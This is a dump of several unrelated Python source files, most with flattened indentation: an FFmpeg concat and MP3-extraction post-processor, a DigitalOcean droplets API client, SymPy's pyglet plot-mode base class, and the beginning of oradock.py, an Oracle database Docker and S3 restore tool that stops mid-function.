FFmpegPostProcessor.__init__(self, downloader)
def run(self, information):
destpath = information['destpath']
if os.path.exists(destpath):
os.remove(destpath)
input_paths = information['__files_to_concat']
oldest_mtime = min(os.stat(path).st_mtime for path in input_paths)
        # build the file-list file for the concat demuxer
input_txtfile = os.path.join(tempfile.gettempdir(), 'input_list.txt')
if os.path.exists(input_txtfile):
os.remove(input_txtfile)
inputf = open(input_txtfile, 'w')
for i, file in enumerate(input_paths):
line = 'file \'%s\'' % file
if i < len(input_paths) - 1:
line += '\n'
inputf.writelines(line)
inputf.close()
        # build the ffmpeg arguments
args = [self.executable]
args += ['-f', 'concat']
#Unsafe file name '/tmp/temp/Watch Naruto Shippuden Season 17
args += ['-safe', '-1']
args += ['-i', input_txtfile]
args += ['-c', 'copy']
        # keep the output on the same disk so the later rename is a fast same-disk move; if the target is mp3 it still needs an extra conversion
filename, ext = os.path.splitext(destpath)
is_audio = True if 'mp3' in ext.lower() else False
if is_audio:
ext = '.mp4'
            # if the target is audio, write an mp4 first and convert afterwards
destpath_new = filename + ext
args += [destpath_new]
try:
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=get_startinfo())
stdout, stderr = p.communicate()
if p.returncode != 0:
stderr = stderr.decode('utf-8', 'replace')
msg = stderr.strip().split('\n')[-1]
raise FFmpegPostProcessorError(msg)
            # if the target is mp3, run the extra conversion now
if is_audio:
converter = FFmpegExtractMp3(self._downloader, preferredquality=self._quality)
info_dict = {}
                # source file
info_dict['filepath'] = destpath_new
                # destination file
info_dict['destpath'] = destpath
converter.run(info_dict)
os.remove(destpath_new)
self.try_utime(destpath, oldest_mtime, oldest_mtime)
except Exception as ex:
debug('multi_video_concat error:')
debug(ex)
if is_audio:
os.remove(destpath_new)
raise ex
finally:
os.remove(input_txtfile)
# extract mp3
class FFmpegExtractMp3(FFmpegPostProcessor):
def __init__(self, downloader=None, preferredquality='320'):
FFmpegPostProcessor.__init__(self, downloader)
self._preferredquality = preferredquality
def run_ffmpeg(self, path, out_path, codec, more_opts):
if codec is None:
acodec_opts = []
else:
acodec_opts = ['-acodec', codec]
opts = ['-vn'] + acodec_opts + more_opts
try:
FFmpegPostProcessor.run_ffmpeg(self, path, out_path, opts)
except FFmpegPostProcessorError as err:
raise AudioConversionError(err.msg)
def run(self, information):
src_path = information['filepath']
acodec = 'libmp3lame'
extension = 'mp3'
more_opts = []
if self._preferredquality is not None:
if int(self._preferredquality) < 10:
more_opts += ['-q:a', self._preferredquality]
else:
more_opts += ['-b:a', self._preferredquality + 'k']
dst_path = information['destpath']
information['ext'] = extension
# If we download foo.mp3 and convert it to... foo.mp3, then don't delete foo.mp3, silly.
if dst_path == src_path:
if self._downloader:
self._downloader.to_screen('[ffmpeg] Post-process file %s exists, skipping' % dst_path)
return
try:
if self._downloader:
self._downloader.to_screen('[ffmpeg] Destination: ' + dst_path)
self.run_ffmpeg(src_path, dst_path, acodec, more_opts)
except AudioConversionError as e:
raise PostProcessingError(
'audio conversion failed: ' + e.msg)
except Exception as ex:
raise PostProcessingError('error running ' + self.basename)
# Try to update the date time for extracted audio file.
if information.get('filetime') is not None:
self.try_utime(
dst_path, time.time(), information['filetime'],
errnote='Cannot update utime of audio file')
class FFmpegFixupM3u8PPForToggle(FFmpegFixupM3u8PP):
def get_audio_codec(self, path):
return 'aac'
def run(self, info):
filename = info['filepath']
if self.get_audio_codec(filename) == 'aac':
destpath = info['destpath']
options = ['-c', 'copy', '-f', 'mp4', '-bsf:a', 'aac_adtstoasc']
self._downloader.to_screen('[ffmpeg] Fixing malformed AAC bitstream in "%s"' % filename)
self.run_ffmpeg(filename, destpath, options)
os.remove(filename)
return [], info
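# FFmpegConcatMultiVideo above drives ffmpeg's concat demuxer through a generated
# list file. The standalone sketch below shows the shape of that invocation; the
# ffmpeg executable name, the input paths and the use of '-safe 0' are
# illustrative assumptions, not the exact flags used by the class.
def _concat_sketch(inputs, output, ffmpeg='ffmpeg'):
    import os
    import subprocess
    import tempfile
    list_path = os.path.join(tempfile.gettempdir(), 'concat_list.txt')
    with open(list_path, 'w') as list_file:
        # one "file '<path>'" line per input segment
        list_file.write('\n'.join("file '%s'" % path for path in inputs))
    try:
        # stream-copy the segments into a single container without re-encoding
        subprocess.check_call([ffmpeg, '-f', 'concat', '-safe', '0',
                               '-i', list_path, '-c', 'copy', output])
    finally:
        os.remove(list_path)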
|
droplets.py
|
from .digitaloceanapiconnection import DigitalOceanAPIConnection
import os
import time
import queue
import threading
import datetime
import random
import json
class Droplets(DigitalOceanAPIConnection):
"""[summary]
Args:
DigitalOceanAPIConnection ([type]): [description]
API Returns Droplet Attributes:
id(int): A unique identifier for each Droplet instance. This is automatically generated upon Droplet creation.
name(str): The human-readable name set for the Droplet instance.
memory(int): Memory of the Droplet in megabytes.
vcpus(int): The number of virtual CPUs.
disk(int): The size of the Droplet's disk in gigabytes.
locked(bool): A boolean value indicating whether the Droplet has been locked, preventing actions by users.
created_at(str): A time value given in ISO8601 combined date and time format that represents when the Droplet was created.
status(str): A status string indicating the state of the Droplet instance. This may be "new", "active", "off", or "archive".
backup_ids([]): An array of backup IDs of any backups that have been taken of the Droplet instance. Droplet backups are enabled at the time of the instance creation.
snapshot_ids([]): An array of snapshot IDs of any snapshots created from the Droplet instance.
features([]): An array of features enabled on this Droplet.
region(obj): The region that the Droplet instance is deployed in. When setting a region, the value should be the slug identifier for the region. When you query a Droplet, the entire region object will be returned.
image(obj): The base image used to create the Droplet instance. When setting an image, the value is set to the image id or slug. When querying the Droplet, the entire image object will be returned.
size(obj): The current size object describing the Droplet. When setting a size, the value is set to the size slug. When querying the Droplet, the entire size object will be returned. Note that the disk volume of a Droplet may not match the size's disk due to Droplet resize actions. The disk attribute on the Droplet should always be referenced.
size_slug(str): The unique slug identifier for the size of this Droplet.
networks(obj): The details of the network that are configured for the Droplet instance. This is an object that contains keys for IPv4 and IPv6. The value of each of these is an array that contains objects describing an individual IP resource allocated to the Droplet. These will define attributes like the IP address, netmask, and gateway of the specific network depending on the type of network it is.
kernel(obj): Nullable object The current kernel. This will initially be set to the kernel of the base image when the Droplet is created.
next_backup_window(obj) Nullable object The details of the Droplet's backups feature, if backups are configured for the Droplet. This object contains keys for the start and end times of the window during which the backup will start.
tags([]): An array of Tags the Droplet has been tagged with.
volume_ids([]): A flat array including the unique identifier for each Block Storage volume attached to the Droplet.
vpc_uuid([]): A string specifying the UUID of the VPC to which the Droplet is assigned.
"""
def __init__(self):
DigitalOceanAPIConnection.__init__(self)
self.endpoint = "/v2/droplets"
def list_all_droplets(self, page=0, per_page=0):
"""[summary]
Returns:
[type]: [description]
API Expects:
page(int) which page to return
per_page(int) how many results per page
API Returns:
A list of droplets objects, with standard droplet attributes.
"""
arguments = locals()
del arguments["self"]
# params must be set from a dictionary not a json dump
params = arguments
return self.get_request(self.endpoint, headers=self.headers, params=params)
def list_all_droplets_by_tag(self, tag_name, page=0, per_page=0):
arguments = locals()
del arguments["self"]
# params must be set from a dictionary not a json dump
params = arguments
return self.get_request(self.endpoint, headers=self.headers, params=params)
def create_new_droplet(
self,
name,
region,
size,
image,
ssh_keys=[],
backups=None,
ipv6=None,
private_networking=None,
vpc_uuid=None,
user_data=None,
monitoring=None,
volumes=[],
tags=[],
):
"""[summary]
Returns:
[type]: [description]
API Expects:
name(str): REQUIRED. The human-readable string you wish to use when displaying the Droplet name. The name, if set to a domain name managed in the DigitalOcean DNS management system, will configure a PTR record for the Droplet. The name set during creation will also determine the hostname for the Droplet in its internal configuration.
region(str): REQUIRED. The unique slug identifier for the region that you wish to deploy in.
size(str): REQUIRED. The unique slug identifier for the size that you wish to select for this Droplet.
image(int,str): REQUIRED. integer (if using an image ID), or String (if using a public image slug) The image ID of a public or private image, or the unique slug identifier for a public image. This image will be the base image for your Droplet.
ssh_keys([]): An array containing the IDs or fingerprints of the SSH keys that you wish to embed in the Droplet's root account upon creation.
backups(bool): A boolean indicating whether automated backups should be enabled for the Droplet. Automated backups can only be enabled when the Droplet is created.
ipv6(bool): A boolean indicating whether IPv6 is enabled on the Droplet.
private_networking(bool): This parameter has been deprecated. Use 'vpc_uuid' instead to specify a VPC network for the Droplet. If no `vpc_uuid` is provided, the Droplet will be placed in the default VPC.
vpc_uuid(str): A string specifying the UUID of the VPC to which the Droplet will be assigned. If excluded, beginning on April 7th, 2020, the Droplet will be assigned to your account's default VPC for the region.
user_data(str): A string containing 'user data' which may be used to configure the Droplet on first boot, often a 'cloud-config' file or Bash script. It must be plain text and may not exceed 64 KiB in size.
monitoring(bool): A boolean indicating whether to install the DigitalOcean agent for monitoring.
volumes([]): A flat array including the unique string identifier for each block storage volume to be attached to the Droplet. At the moment a volume can only be attached to a single Droplet.
tags([]) A flat array of tag names as strings to apply to the Droplet after it is created. Tag names can either be existing or new tags.
API Returns:
A droplets object, with standard droplet attributes.
API data example:
data = '{"name":"example.com","region":"nyc3","size":"s-1vcpu-1gb","image":"ubuntu-16-04-x64","ssh_keys":[107149],"backups":false,"ipv6":true,"user_data":null,"private_networking":null,"volumes": null,"tags":["web"]}'
"""
arguments = locals()
del arguments["self"]
data = json.dumps(arguments)
return self.post_request(self.endpoint, headers=self.headers, data=data)
def delete_droplet_id(self, id):
"""
To delete a Droplet, send a DELETE request to /v2/droplets/$DROPLET_ID
"""
return self.delete_request(f"{self.endpoint}/{id}", headers=self.headers)
def delete_droplet_tag(self, tag_name):
"""
To delete Droplets by a tag (for example awesome), send a DELETE request to /v2/droplets?tag_name=$TAG_NAME.
"""
return self.delete_request(
f"{self.endpoint}?tag_name={tag_name}", headers=self.headers
)
def retrieve_droplet_by_id(self, id):
"""[summary]
Args:
id ([type]): [description]
To show information about an individual Droplet, send a GET request to /v2/droplets/$DROPLET_ID.
"""
return self.get_request(f"{self.endpoint}/{id}", headers=self.headers)
def retrieve_droplet_action(self, droplet_id, action_id):
"""
Args:
droplet_id ([type]): [description]
action_id ([type]): [description]
"""
return self.get_request(
f"{self.endpoint}/{droplet_id}/actions/{action_id}", headers=self.headers
)
def reboot_droplet(self, id):
"""
Args:
id ([type]): [description]
"""
data_dict = {}
data_dict["type"] = "reboot"
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def shutdown_droplet(self, id):
"""
Args:
id ([type]): [description]
"""
data_dict = {}
data_dict["type"] = "shutdown"
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def poweron_droplet(self, id):
"""
Args:
id ([type]): [description]
"""
data_dict = {}
data_dict["type"] = "power_on"
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def poweroff_droplet(self, id):
"""
Args:
id ([type]): [description]
"""
data_dict = {}
data_dict["type"] = "power_off"
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def powercycle_droplet(self, id):
"""
Args:
id ([type]): [description]
"""
data_dict = {}
data_dict["type"] = "power_cycle"
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def rebuild_droplet(self, id, image):
"""
        The rebuild action works just like a fresh create.
Args:
id ([type]): Droplet ID
image ([type]): Image slug or ID.
Returns:
[type]: [description]
"""
data_dict = {}
data_dict["type"] = "rebuild"
data_dict["image"] = image
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def rename_droplet(self, id, name):
print("rename api called")
"""
Rebuld action functions just like a new create.
Args:
id ([type]): Droplet ID
name ([type]): New droplet name
Returns:
[type]: [description]
"""
data_dict = {}
data_dict["type"] = "rename"
data_dict["name"] = name
data = json.dumps(data_dict)
endpoint = f"{self.endpoint}/{id}/actions"
print(endpoint)
print(data)
return self.post_request(endpoint, headers=self.headers, data=data)
print("api finished")
def create_snapshot_from_droplet(self, id, name):
data_dict = {}
data_dict["type"] = "snapshot"
data_dict["name"] = name
# api doesnt let you have tags for droplets at this point
# data_dict["tags"] = tags
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{id}/actions", headers=self.headers, data=data
)
def list_snapshots_for_droplet(self, id, page=0, per_page=0):
arguments = locals()
del arguments["self"]
del arguments["id"]
# params must be set from a dictionary not a json dump
params = arguments
return self.get_request(
f"{self.endpoint}/{id}/snapshots", headers=self.headers, params=params
)
def restore_droplet(self, droplet_id, image_id):
data_dict = {}
data_dict["type"] = "restore"
data_dict["image"] = image_id
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{droplet_id}/actions", headers=self.headers, data=data
)
def resize_droplet(self, droplet_id, size, disk_resize=False):
        ## WARNING: if you try to resize to a smaller disk, the API call will hang.
        ## TODO: implement a check that the requested resize is allowed.
"""[summary]
Args:
droplet_id ([type]): [description]
size ([type]): [description]
            disk_resize (bool, optional): When set to True, not only the memory is resized but the disk is also upgraded to the slug's disk size, meaning you can't resize back down. Defaults to False.
Returns:
[type]: [description]
"""
data_dict = {}
data_dict["type"] = "resize"
if disk_resize:
data_dict["disk"] = True
data_dict["size"] = size
data = json.dumps(data_dict)
return self.post_request(
f"{self.endpoint}/{droplet_id}/actions", headers=self.headers, data=data
)
def list_droplet_resources(self, droplet_id):
return self.get_request(
f"{self.endpoint}/{droplet_id}/destroy_with_associated_resources",
headers=self.headers,
)
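# A minimal sketch of polling a droplet action until DigitalOcean reports it
# finished. It assumes the actions endpoints return a JSON body shaped like
# {"action": {"id": ..., "status": "in-progress" | "completed" | "errored"}}
# and that the request helpers return a requests-style response object, as the
# __main__ example below suggests. The helper name and the timing values are
# illustrative, not part of this module's API.
def wait_for_action(droplets, droplet_id, action_id, interval=5, attempts=60):
    for _ in range(attempts):
        response = droplets.retrieve_droplet_action(droplet_id, action_id)
        action = json.loads(response.content.decode("utf-8"))["action"]
        if action["status"] in ("completed", "errored"):
            return action["status"]
        time.sleep(interval)
    return "timed-out"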
if __name__ == "__main__":
digitalocean_droplets = Droplets()
# def make_a_call_to_digitalocea_to_list_all_droplets(x):
# response = digitalocean_droplets.list_all_droplets()
# print(x, datetime.datetime.now())
# for x in range(0, 20):
# threading.Thread(
# target=make_a_call_to_digitalocea_to_list_all_droplets, args=(x,)
# ).start()
response = digitalocean_droplets.create_new_droplet(
name="example.com",
region="nyc3",
size="s-1vcpu-1gb",
image="ubuntu-16-04-x64",
ssh_keys=[],
backups=False,
ipv6=True,
user_data=None,
private_networking=None,
volumes=None,
tags=["banabas"],
)
# response = digitalocean_droplets.delete_droplet_id(249612802)
# response = digitalocean_droplets.list_all_droplets(page=1, per_page=2)
content = response.content.decode("utf-8")
droplet_data = dict(json.loads(content)["droplet"])
print(droplet_data)
|
plot_mode_base.py
|
from __future__ import print_function, division
from pyglet.gl import *
from plot_mode import PlotMode
from threading import Thread, Event, RLock
from color_scheme import ColorScheme
from sympy.core import S
from sympy.core.compatibility import is_sequence
from time import sleep
import warnings
class PlotModeBase(PlotMode):
"""
Intended parent class for plotting
modes. Provides base functionality
in conjunction with its parent,
PlotMode.
"""
##
## Class-Level Attributes
##
"""
The following attributes are meant
to be set at the class level, and serve
as parameters to the plot mode registry
(in PlotMode). See plot_modes.py for
concrete examples.
"""
"""
i_vars
'x' for Cartesian2D
'xy' for Cartesian3D
etc.
d_vars
'y' for Cartesian2D
'r' for Polar
etc.
"""
i_vars, d_vars = '', ''
"""
intervals
Default intervals for each i_var, and in the
same order. Specified [min, max, steps].
No variable can be given (it is bound later).
"""
intervals = []
"""
aliases
A list of strings which can be used to
access this mode.
'cartesian' for Cartesian2D and Cartesian3D
'polar' for Polar
'cylindrical', 'polar' for Cylindrical
Note that _init_mode chooses the first alias
in the list as the mode's primary_alias, which
will be displayed to the end user in certain
contexts.
"""
aliases = []
"""
is_default
Whether to set this mode as the default
for arguments passed to PlotMode() containing
the same number of d_vars as this mode and
at most the same number of i_vars.
"""
is_default = False
"""
All of the above attributes are defined in PlotMode.
The following ones are specific to PlotModeBase.
"""
"""
A list of the render styles. Do not modify.
"""
styles = {'wireframe': 1, 'solid': 2, 'both': 3}
"""
style_override
Always use this style if not blank.
"""
style_override = ''
"""
default_wireframe_color
default_solid_color
Can be used when color is None or being calculated.
Used by PlotCurve and PlotSurface, but not anywhere
in PlotModeBase.
"""
default_wireframe_color = (0.85, 0.85, 0.85)
default_solid_color = (0.6, 0.6, 0.9)
default_rot_preset = 'xy'
##
## Instance-Level Attributes
##
## 'Abstract' member functions
def _get_evaluator(self):
if self.use_lambda_eval:
try:
e = self._get_lambda_evaluator()
return e
except:
warnings.warn("\nWarning: creating lambda evaluator failed. "
"Falling back on sympy subs evaluator.")
return self._get_sympy_evaluator()
def _get_sympy_evaluator(self):
raise NotImplementedError()
def _get_lambda_evaluator(self):
raise NotImplementedError()
def _on_calculate_verts(self):
raise NotImplementedError()
def _on_calculate_cverts(self):
raise NotImplementedError()
## Base member functions
def __init__(self, *args, **kwargs):
self.verts = []
self.cverts = []
self.bounds = [[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0]]
self.cbounds = [[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0],
[S.Infinity, -S.Infinity, 0]]
self._draw_lock = RLock()
self._calculating_verts = Event()
self._calculating_cverts = Event()
self._calculating_verts_pos = 0.0
self._calculating_verts_len = 0.0
self._calculating_cverts_pos = 0.0
self._calculating_cverts_len = 0.0
self._max_render_stack_size = 3
self._draw_wireframe = [-1]
self._draw_solid = [-1]
self._style = None
self._color = None
self.predraw = []
self.postdraw = []
self.use_lambda_eval = self.options.pop('use_sympy_eval', None) is None
self.style = self.options.pop('style', '')
self.color = self.options.pop('color', 'rainbow')
self.bounds_callback = kwargs.pop('bounds_callback', None)
self._on_calculate()
def synchronized(f):
def w(self, *args, **kwargs):
self._draw_lock.acquire()
try:
r = f(self, *args, **kwargs)
return r
finally:
self._draw_lock.release()
return w
@synchronized
def push_wireframe(self, function):
"""
Push a function which performs gl commands
used to build a display list. (The list is
built outside of the function)
"""
assert callable(function)
self._draw_wireframe.append(function)
if len(self._draw_wireframe) > self._max_render_stack_size:
del self._draw_wireframe[1] # leave marker element
@synchronized
def push_solid(self, function):
"""
Push a function which performs gl commands
used to build a display list. (The list is
built outside of the function)
"""
assert callable(function)
self._draw_solid.append(function)
if len(self._draw_solid) > self._max_render_stack_size:
del self._draw_solid[1] # leave marker element
def _create_display_list(self, function):
dl = glGenLists(1)
glNewList(dl, GL_COMPILE)
function()
glEndList()
return dl
def _render_stack_top(self, render_stack):
top = render_stack[-1]
if top == -1:
return -1 # nothing to display
elif callable(top):
dl = self._create_display_list(top)
render_stack[-1] = (dl, top)
return dl # display newly added list
elif len(top) == 2:
if GL_TRUE == glIsList(top[0]):
return top[0] # display stored list
dl = self._create_display_list(top[1])
render_stack[-1] = (dl, top[1])
return dl # display regenerated list
def _draw_solid_display_list(self, dl):
glPushAttrib(GL_ENABLE_BIT | GL_POLYGON_BIT)
glPolygonMode(GL_FRONT_AND_BACK, GL_FILL)
glCallList(dl)
glPopAttrib()
def _draw_wireframe_display_list(self, dl):
glPushAttrib(GL_ENABLE_BIT | GL_POLYGON_BIT)
glPolygonMode(GL_FRONT_AND_BACK, GL_LINE)
glEnable(GL_POLYGON_OFFSET_LINE)
glPolygonOffset(-0.005, -50.0)
glCallList(dl)
glPopAttrib()
@synchronized
def draw(self):
for f in self.predraw:
if callable(f):
f()
if self.style_override:
style = self.styles[self.style_override]
else:
style = self.styles[self._style]
# Draw solid component if style includes solid
if style & 2:
dl = self._render_stack_top(self._draw_solid)
if dl > 0 and GL_TRUE == glIsList(dl):
self._draw_solid_display_list(dl)
# Draw wireframe component if style includes wireframe
if style & 1:
dl = self._render_stack_top(self._draw_wireframe)
if dl > 0 and GL_TRUE == glIsList(dl):
self._draw_wireframe_display_list(dl)
for f in self.postdraw:
if callable(f):
f()
def _on_change_color(self, color):
Thread(target=self._calculate_cverts).start()
def _on_calculate(self):
Thread(target=self._calculate_all).start()
def _calculate_all(self):
self._calculate_verts()
self._calculate_cverts()
def _calculate_verts(self):
if self._calculating_verts.isSet():
return
self._calculating_verts.set()
try:
self._on_calculate_verts()
finally:
self._calculating_verts.clear()
if callable(self.bounds_callback):
self.bounds_callback()
def _calculate_cverts(self):
if self._calculating_verts.isSet():
return
while self._calculating_cverts.isSet():
sleep(0) # wait for previous calculation
self._calculating_cverts.set()
try:
self._on_calculate_cverts()
finally:
self._calculating_cverts.clear()
def _get_calculating_verts(self):
return self._calculating_verts.isSet()
def _get_calculating_verts_pos(self):
return self._calculating_verts_pos
def _get_calculating_verts_len(self):
return self._calculating_verts_len
def _get_calculating_cverts(self):
return self._calculating_cverts.isSet()
def _get_calculating_cverts_pos(self):
return self._calculating_cverts_pos
def _get_calculating_cverts_len(self):
return self._calculating_cverts_len
## Property handlers
def _get_style(self):
return self._style
@synchronized
def _set_style(self, v):
if v is None:
return
if v == '':
step_max = 0
for i in self.intervals:
if i.v_steps is None:
continue
step_max = max([step_max, int(i.v_steps)])
v = ['both', 'solid'][step_max > 40]
#try:
if v not in self.styles:
raise ValueError("v should be there in self.styles")
if v == self._style:
return
self._style = v
#except Exception as e:
#raise RuntimeError(("Style change failed. "
# "Reason: %s is not a valid "
# "style. Use one of %s.") %
# (str(v), ', '.join(self.styles.iterkeys())))
def _get_color(self):
return self._color
@synchronized
def _set_color(self, v):
try:
if v is not None:
if is_sequence(v):
v = ColorScheme(*v)
else:
v = ColorScheme(v)
if repr(v) == repr(self._color):
return
self._on_change_color(v)
self._color = v
except Exception as e:
raise RuntimeError(("Color change failed. "
"Reason: %s" % (str(e))))
style = property(_get_style, _set_style)
color = property(_get_color, _set_color)
calculating_verts = property(_get_calculating_verts)
calculating_verts_pos = property(_get_calculating_verts_pos)
calculating_verts_len = property(_get_calculating_verts_len)
calculating_cverts = property(_get_calculating_cverts)
calculating_cverts_pos = property(_get_calculating_cverts_pos)
calculating_cverts_len = property(_get_calculating_cverts_len)
## String representations
def __str__(self):
f = ", ".join(str(d) for d in self.d_vars)
o = "'mode=%s'" % (self.primary_alias)
return ", ".join([f, o])
def __repr__(self):
f = ", ".join(str(d) for d in self.d_vars)
i = ", ".join(str(i) for i in self.intervals)
d = [('mode', self.primary_alias),
('color', str(self.color)),
('style', str(self.style))]
o = "'%s'" % (("; ".join("%s=%s" % (k, v)
for k, v in d if v != 'None')))
return ", ".join([f, i, o])
|
oradock.py
|
#!/usr/bin/env python
"""
Oradock is an Oracle Database 11g management system integrated with Docker, where you can easily start a database from scratch or download & recover a backup from s3 (aws).
For more information, please visit https://github.com/rafaelmariotti/oradock
Usage:
oradock.py (restore | restart) DATABASE MEMORY SERVICE_NAME [options]
oradock.py create database DATABASE PASSWORD MEMORY SERVICE_NAME [options]
oradock.py create image IMAGE_NAME PASSWORD [options]
oradock.py (-h | --help)
oradock.py --version
Operations:
restore
Restore and recovery database backup files.
restart
Restart and configure a container that already has datafiles restored.
create database
Create a new empty database.
create image
Create an Oracle image.
Arguments:
DATABASE
Database(s) target name to work, separate by comma.
MEMORY
Memory percent to reserve for each database, separate by comma.
PASSWORD
Single password to set oracle and sys users.
SERVICE_NAME
Main service name for each database, separate by comma.
IMAGE_NAME
Image name to build.
Options:
-k ORADOCK_HOME, --oradock-home=ORADOCK_HOME
Directory where oradock binary are located [default: /opt/oradock].
-l LOG_LEVEL, --log-level=LOG_LEVEL
Log level to set [default: info].
Create image options:
-o OINSTALL_DIR, --oinstall-dir=OINSTALL_DIR
Directory with Oracle binary files to install [default: $ORADOCK_HOME/conf/dockerfile/config_files/database].
-d DOCKERFILE, --dockerfile-template=DOCKERFILE
Dockerfile template to build Oracle docker image [default: $ORADOCK_HOME/conf/dockerfile/Dockerfile.template].
Restore options:
-b BACKUP_DIR, --backup-directory=BACKUP_DIR
Directory home path for each backup location, separated by comma [default: /backup/$DATABASE].
-c CFILE_NAME, --control-file-name=CFILE_NAME
Controlfile name to search among backup files to restore [default: controlfile.bkp].
-s SPFILE_NAME, --spfile-name=SPFILE_NAME
Spfile name to search among backup files to restore [default: spfile.bkp].
-A ACCESS_KEY, --s3-access-key=ACCESS_KEY
Access key to download from s3 bucket.
-B S3_BUCKET, --s3-bucket=S3_BUCKET
s3 bucket directory to download the backup files.
-S SECRET_KEY, --s3-secret-key=SECRET_KEY
Secret key to download from s3 bucket.
-P PARALLEL, --parallel=PARALLEL
Set the parallel level to restore backups [default: 1].
Restore, restart & create database options:
-D DATAFILE_DIR, --datafile-dir=DATAFILE_DIR
Base directory where datafiles will be stored and separated by directories [default: /data].
-i IMAGE_NAME, --image-name=IMAGE_NAME
Set which Docker image oradock has to use [default: rafaelmariotti/oracle-ee-11g:latest].
-p PORT, --port=PORT
Database port which container will use [default: 1521].
-C CONTAINER_NAME, --container-name=CONTAINER_NAME
Set the container name to create [default: oradock-db-$DATABASE].
-F, --force-pull
Forces a docker pull to update the image that oradock is using.
General options:
-h, --help
Show help menu.
Funny options:
--animation=ANIMATION_NUMBER
Choose your own animation while creating Oracle docker image, between 1 and 2 [default: 1].
"""
__author__ = 'Rafael dos Santos Mariotti <rafael.s.mariotti@gmail.com>'
__version__ = 'oradock v1.0'
try:
import logging
import collections
import sys
import os
import re
import errno
import time
import socket
import boto.exception
from multiprocessing import Process, Manager
from docopt import docopt
from shutil import copyfile
from shutil import copytree
from shutil import rmtree
from shutil import chown
from boto.s3.connection import S3Connection
from docker import Client
from docker import errors as docker_error
except ImportError as error: #check for all modules
print('ERROR: Could not find module \'%s\'' % error.name)
sys.exit(-1)
def set_log(log_level): #set log level to print
log_level_number = getattr(logging, log_level.upper(), None)
if not isinstance(log_level_number, int):
print('ERROR: Invalid log level \'%s\'' % log_level.upper())
sys.exit(-1)
logging.basicConfig(level=log_level.upper(), format='%(asctime)s %(levelname)s: %(message)s', datefmt='%Y-%m-%d %H:%M:%S', stream=sys.stdout)
logging.StreamHandler(sys.stdout)
## s3 functions
def create_s3conn(access_key, secret_key): #open s3 connection
try:
s3connection=S3Connection(access_key, secret_key)
except boto.exception.AWSConnectionError as error:
logging.error('unexpected response while trying connect to aws s3 [%s]' % error.args[0])
sys.exit(-1)
except boto.exception.S3ResponseError as error:
logging.error('unexpected response from s3 [%s]' % error.args[1])
sys.exit(-1)
return s3connection
def retrieve_s3bucket_info(s3connection, s3_bucket_name): #get s3 bucket files
try:
s3_bucket_conn=s3connection.lookup(s3_bucket_name)
except boto.exception.S3ResponseError as error:
logging.error('unexpected response from s3 [%s]' % error.args[1])
sys.exit(-1)
except boto.exception.S3DataError as error:
logging.error('error while retrieving data from s3 [%s]' % error.args[0])
sys.exit(-1)
return s3_bucket_conn
def download_file(s3_file, file_dest_path): #download a single file from s3 bucket
if os.path.exists(file_dest_path):
if os.path.getsize(file_dest_path) != s3_file.size:
logging.warning('file \'%s\' already exists and is corrupted. Downloading again (%s mb)' % (file_dest_path, str(round(int(s3_file.size)/(1024*1024),2))))
else:
logging.warning('file \'%s\' already exists' % file_dest_path)
return
else:
logging.info('downloading file \'%s\' (%s mb)' % (file_dest_path, str(round(int(s3_file.size)/(1024*1024),2))))
try_limit=3 #times to attempt the download
timeout_sleep=5 #sleep time in seconds to wait after a timeout
try_count=0
download_success=False
while(download_success==False and try_count<try_limit):
try:
try_count = try_count + 1
s3_file.get_contents_to_filename(file_dest_path)
if os.path.getsize(file_dest_path) != s3_file.size:
                logging.warning('file \'%s\' is corrupted (%s mb). Downloading again (attempt: %s of %s)' % (file_dest_path, str(round(int(s3_file.size)/(1024*1024),2)), str(try_count), str(try_limit)))
else:
download_success=True
except boto.exception.S3ResponseError as error:
logging.error('unexpected response from s3 [%s]' % error.args[1])
sys.exit(-1)
except boto.exception.S3DataError as error:
logging.error('error while retrieving data from s3 [%s]' % error.args[0])
sys.exit(-1)
except boto.exception.S3CopyError as error:
logging.error('error while copying data from s3 [%s]' % error.args[1])
sys.exit(-1)
except boto.exception.S3PermissionsError as error:
            logging.error('permission denied on s3 file \'%s\' [%s]' % (file_dest_path, error.args[0]))
sys.exit(-1)
except socket.timeout as error:
logging.warning('timeout occurred. Download attempt: %s of %s' %(try_count, try_limit))
time.sleep(timeout_sleep)
if(download_success==False):
logging.error('s3 download timeout reached or file is corrupted. Please check your connection and s3 bucket information')
sys.exit(-1)
def get_s3_full_path_dir(s3_bucket):
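    #expects an url like 's3://bucket-name/path/to/backup' and returns (path/to/backup, bucket-name)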
s3_bucket_name=s3_bucket.split('/')[2]
s3_full_path_dir='/'.join(s3_bucket.split('/')[s3_bucket.split('/').index(s3_bucket_name)+1:])
return s3_full_path_dir,s3_bucket_name
def download_s3(database_list, backup_dir, access_key, secret_key): #download all files from s3 bucket
s3connection=create_s3conn(access_key, secret_key)
for database, info in database_list.items():
memory = info.get('memory')
service_name = info.get('service_name')
s3_bucket = info.get('s3_bucket')
backup_dir = info.get('backup_directory')
logging.debug('looking for backup files in s3 bucket \'%s\' for database %s' % (s3_bucket, database))
(s3_full_path_dir,s3_bucket_name)=get_s3_full_path_dir(s3_bucket)
s3_bucket_conn=retrieve_s3bucket_info(s3connection, s3_bucket_name)
create_directory(backup_dir)
for s3_file in s3_bucket_conn.list(s3_full_path_dir,''):
s3_file_name = s3_file.name.split('/')[-1]
file_dest_path = backup_dir +'/'+ s3_file_name
download_file(s3_file, file_dest_path)
    s3connection.close()
## all preprocess
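#the preprocess_* helpers normalize the docopt arguments before use: trailing '/' are stripped
#and options that do not apply to a subcommand are filled with '-' placeholders, one per
#database in the comma-separated DATABASE list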
def preprocess_restore_args(args):
if args['--s3-bucket'] is None:
